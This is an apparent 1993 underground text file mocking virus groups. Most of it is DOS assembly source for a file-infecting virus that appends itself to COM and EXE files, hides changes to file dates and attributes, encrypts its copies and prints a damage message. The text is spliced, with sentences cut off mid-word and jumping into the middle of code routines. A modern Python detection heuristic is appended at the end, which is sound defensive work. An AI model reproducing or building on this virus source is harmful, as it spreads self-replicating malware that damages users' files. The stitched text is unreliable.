[07.15.93]
[------------------------------------------------------------------------]
[ 2MUCH THINKING                                        (C) 1993 by 2MT   ]
[------------------------------------------------------------------------]

                    The /<-Rad Warez D00D Presents...

----------------------* The Birth of a New Group *------------------------

 _______________________________________________________________________
/ Disclaimer:                                                           \
| If we happen to mention you in this text and you happen to find       |
| it offensive well please, don't CRY! We don't give a damn if you find |
| it offensive. This is just our thoughts put into a text file and      |
| released to the public. All of it is the truth and only people that   |
| are hiding something will find it offensive. Enjoy...                 |
\_______________________________________________________________________/

2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT

As of today I'm starting a new group. Just got to think of a name. How about GRIND. Wait we need the small i. That will look cool. Ya GRiND. Fits perfectly. Now that we found a cool name we've got to take each letter and put words in so we can be like every other / pklite tiny.com

Now a tiny-x virus. We need another Jerusalem strain.

C:\> pklite jerusalm.com

Now a jerusalem-x virus. We'll pklite nuke pox and hide the 50 damn lines of copywrite put in by rock steady. Haha shows how lame he is.

C:\> pklite nk-pox.com

Now a nuke Pox x virus. Our first three releases. I feel like I've made a break-thru. Time to program some real viruses. Let me pull out that VCL. No not that... it has more bugs in it than the pussy of Nowhere Man's Mom. Let me use MPC. No how about the improved IVP v1.0. Ahhh now I'll make a wicked virus. Infects .COM/.EXE files.
Changes directories doesn't get command.com and more. Time to put in some text. "(C) 1993 GRiND" "Better watch out for the GRiND virus!" "Now GRiNDing your HD and doing some damage." "This virus is copyrite 1993 by GRiND and GRiND associates." "We are so /new handler int 21h push cs ; Restore ES pop es ; 'cuz it was changed mov ah,47h ; Get the current directory mov dl,0h ; On current drive lea si,[bp+offset currentdir] ; Where to keep it int 21h dirloop: lea dx,[bp+offset exefilespec] call findfirst lea dx,[bp+offset comfilespec] call findfirst lea dx,[bp+offset directory] ; Where to change too '..' mov ah,3bh ; Change directory int 21h jnc dirloop ; If no problems the look for files mov ah,9 ; Display string lea dx,[bp+text] int 21h mov ax,2524h ; Restore int 24 handler lds dx,[bp+offset oldint24] ; To original int 21h push cs pop ds ; Do this because the DS gets changed lea dx,[bp+offset currentdir] ; Location Of original dir mov ah,3bh ; Change to there int 21h mov dx,80h ; Location of original DTA call set_dta ; Put it back there cmp sp,id-4 ; EXE or COM? jz returnEXE retn ; Return to 100h to original jump ReturnEXE: pop es ; Get original ES pop ds ; Get original DS mov ax,es add ax,10h add word ptr cs:[bp+jmpsave+2],ax add ax,word ptr cs:[bp+stacksave+2] cli ; Clear int's because of stack manipulation mov sp,word ptr cs:[bp+stacksave] mov ss,ax sti db 0eah ; Jump ssss:oooo jmpsave dd ? ; Jump location stacksave dd ? ; Original cs:ip jmpsave2 dd 0fff00000h ; Used with carrier file stacksave2 dd ? 
findfirst: mov ah,4eh ; Find first file mov cx,7 ; Find all attributes findnext: int 21h ; Find first/next file int jc quit ; If none found then change dir call infection ; Infect that file Findnext2: mov ah,4fh ; Find next file jmp findnext ; Jump to the loop quit: ret infection: mov ax,3d00h ; Open file for read only call open mov ah,3fh ; Read from file mov cx,1ah lea dx,[bp+offset buffer] ; Location to store them int 21h mov ah,3eh ; Close file int 21h cmp word ptr [bp+buffer],'ZM' ; EXE? jz checkEXE ; Why yes, yes it is! mov ax,word ptr [bp+DTA+35] ; Get end of file name in ax cmp ax,'DN' ; Does End in comma'ND'? (reverse order) jz quitinfect ; Yup so get another file CheckCom: mov bx,[bp+offset dta+1ah] ; Get file size mov cx,word ptr [bp+buffer+1] ; Get jump loc of file add cx,eof-virus+3 ; Add for virus size cmp bx,cx ; Does file size=file jump+virus size jz quitinfect ; Yup then get another file jmp infectcom CheckExe: cmp word ptr [bp+buffer+10h],id ; Check EXE for infection jz quitinfect ; Already infected so close up jmp infectexe quitinfect: ret InfectCom: sub bx,3 ; Adjust for new jump lea si,[bp+buffer] lea di,[bp+oldjump] movsw movsb mov [bp+buffer],byte ptr 0e9h mov word ptr [bp+buffer+1],bx ; Save for later mov cx,3 ; Number of bytes to write jmp finishinfection InfectExe: les ax,dword ptr [bp+buffer+14h] ; Load es with seg address mov word ptr [bp+jmpsave2],ax ; save old cs:ip mov word ptr [bp+jmpsave2+2],es les ax,dword ptr [bp+buffer+0eh] ; save old ss:sp mov word ptr [bp+stacksave2],es ; save old cs:ip mov word ptr [bp+stacksave2+2],ax mov ax, word ptr [bp+buffer+8] ; get header size mov cl,4 shl ax,cl xchg ax,bx les ax,[bp+offset DTA+26] ; get files size from dta mov dx,es ; its now in dx:ax push ax ; save these push dx sub ax,bx ; subtract header size from fsize sbb dx,0 ; subtract the carry too mov cx,10h ; convert to segment:offset form div cx mov word ptr [bp+buffer+14h],dx ; put in new header mov word ptr [bp+buffer+16h],ax ; cs:ip mov 
word ptr [bp+buffer+0eh],ax ; ss:sp mov word ptr [bp+buffer+10h],id ; put id in for later pop dx ; get the file length back pop ax add ax,eof-virus ; add virus size adc dx,0 ; add with carry mov cl,9 ; calculates new file size push ax shr ax,cl ror dx,cl stc adc dx,ax pop ax and ah,1 mov word ptr [bp+buffer+4],dx ; save new file size in header mov word ptr [bp+buffer+2],ax push cs ; es = cs pop es mov cx,1ah ; Number of bytes to write (Header) FinishInfection: push cx ; save # of bytes to write xor cx,cx ; Set attriutes to none call attributes mov al,2 ; open file read/write call open mov ah,40h ; Write to file lea dx,[bp+buffer] ; Location of bytes pop cx ; Get number of bytes to write int 21h jc closefile mov al,02 ; Move Fpointer to eof Call move_fp get_time: mov ah,2ch ; Get time for our encryption value int 21h cmp dh,0 ; If its seconds are zere get another je get_time mov [bp+enc_value],dh ; Use seconds value for encryption call encrypt_infect ; Encrypt and infect the file closefile: mov ax,5701h ; Set files date/time back mov cx,word ptr [bp+dta+16h] ; Get old time from dta mov dx,word ptr [bp+dta+18h] ; Get old date int 21h mov ah,3eh ; Close file int 21h xor cx,cx mov cl,byte ptr [bp+dta+15h] ; Get old Attributes call attributes retn move_fp: mov ah,42h ; Move file pointer xor cx,cx ; Al has location xor dx,dx ; Clear these int 21h retn set_dta: mov ah,1ah ; Move the DTA location int 21h retn open: mov ah,3dh ; open file lea dx,[bp+DTA+30] ; filename in DTA int 21h xchg ax,bx ; file handle in bx ret attributes: mov ax,4301h ; Set attributes to cx lea dx,[bp+DTA+30] ; filename in DTA int 21h ret int24: ; New int 24h (error) handler mov al,3 ; Fail call iret ; Return from int 24 call Text db '(C) 1993 GRiND',10,13 db 'Better watch out for the GRiND virus!',10,13 db 'Now GRiNDing your HD and doing some damage.',10,13 db 'This virus is copyrite 1993 by GRiND and GRiND associates.',10,13 db 'We are so /
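
The listing's own "already infected" checks give a defender something to scan for: a COM file whose leading E9 jump lands just before end of file, and an EXE whose entry point is the old end of file with IP below 16, SS equal to CS, and the `id` word stored in the SP field at header offset 10h. The check below is an added example, not part of the original text file; `max_tail`, `sp_marker` and the sample values are assumptions, since the page gives neither the appended-code size nor the value of `id`.

```python
import struct

def appender_findings(data, max_tail=2048, sp_marker=None):
    """Heuristic findings for the COM/EXE layouts the listing writes.
    max_tail: assumed bound on appended-code size; sp_marker: the listing's
    `id` word if known (neither value appears on the page)."""
    findings, size = [], len(data)
    if size >= 0x1A and data[:2] == b"MZ":
        (hdr_paras,) = struct.unpack_from("<H", data, 0x08)
        ss, sp = struct.unpack_from("<HH", data, 0x0E)
        ip, cs = struct.unpack_from("<HH", data, 0x14)
        entry = hdr_paras * 16 + ((cs * 16 + ip) & 0xFFFFF)
        # Listing: new CS:IP = (old size - header size) / 16, so IP < 16
        # and the entry point is the old end of file.
        if 0 < size - entry <= max_tail and ip < 16:
            findings.append("exe-entry-in-tail")
            if ss == cs:  # listing stores the same segment in SS
                findings.append("exe-ss-equals-cs")
        if sp_marker is not None and sp == sp_marker:
            findings.append("exe-sp-marker")
    elif size >= 3 and data[0] == 0xE9:
        (disp,) = struct.unpack_from("<H", data, 1)
        target = (disp + 3) & 0xFFFF  # near jump is relative to offset 3
        if target < size and size - target <= max_tail:
            findings.append("com-jump-to-tail")
    return findings

# Constructed samples (filler bytes only, no code from the listing).
def sample_com(orig_len, tail_len):
    """COM whose first 3 bytes are E9 + (orig_len - 3), plus a tail."""
    head = b"\xE9" + struct.pack("<H", orig_len - 3)
    return head + b"\x90" * (orig_len - 3) + b"\x00" * tail_len

def sample_mz(cs, ip, ss, sp, body_len):
    """32-byte MZ header (2 paragraphs) followed by filler."""
    hdr = bytearray(32)
    hdr[0:2] = b"MZ"
    struct.pack_into("<H", hdr, 0x08, 2)
    struct.pack_into("<HH", hdr, 0x0E, ss, sp)
    struct.pack_into("<HH", hdr, 0x14, ip, cs)
    return bytes(hdr) + b"\x90" * body_len

if __name__ == "__main__":
    print(appender_findings(sample_com(5000, 700)))
    print(appender_findings(sample_mz(62, 8, 62, 0x1234, 1600), sp_marker=0x1234))
```

Small COM files that legitimately start with a jump will also match `com-jump-to-tail` when the whole file is shorter than `max_tail`, so treat a hit as a reason to inspect the file, not as a verdict.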